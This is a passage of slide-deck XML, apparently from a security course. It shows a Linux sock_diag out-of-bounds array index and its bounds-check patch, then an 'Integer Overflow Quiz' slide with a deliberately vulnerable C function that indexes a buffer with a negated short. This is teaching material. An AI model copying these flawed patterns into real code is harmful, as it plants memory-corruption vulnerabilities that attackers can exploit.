              <a:t>__sock_diag_rcv_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(struct sk_buff *skb, struct nlmsghdr *nlh)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>   if (nlmsg_len(nlh) &lt; sizeof(*req))</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>     return -EINVAL;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>+  if (req-&gt;sdiag_family &gt;= AF_MAX)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>+    return -EINVAL;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>hndl = sock_diag_lock_handler(req-&gt;sdiag_family);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>   if (hndl == NULL)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 	err = -ENOENT;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>     else</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>err = hndl-&gt;dump(skb, nlh);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2035" name="Shape 2035"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6692000" y="1841433"/>
            <a:ext cx="5084400" cy="41324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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>static const inline struct sock_diag_handler *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sock_diag_lock_handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	if (sock_diag_handlers[family] == NULL)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>            	request_module("net-pf-%d-proto-%d-type-%d", PF_NETLINK,</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>                                NETLINK_SOCK_DIAG, family);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	mutex_lock(&amp;sock_diag_table_mutex);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sock_diag_handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>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2039"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2040" name="Shape 2040"/>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Integer Overflow Quiz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2042" name="Shape 2042"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="9721850" cy="1731963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer Overflow vulnerability can be regarded as some kind of logic bug.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer overflow itself cannot be exploited, it is usually used to trigger buffer overflow/heap overflow or used with ROP, ret2libc, etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2041" name="Shape 2041"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195867" y="4144933"/>
            <a:ext cx="6314400" cy="2336400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int test(short param, int value) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    int * mybuf = (int *)malloc(65536 * sizeof(int));</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    if (param &lt; 0) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>        param = -param;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    mybuf[param] = value;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    return mybuf; </a:t>
            </a:r>
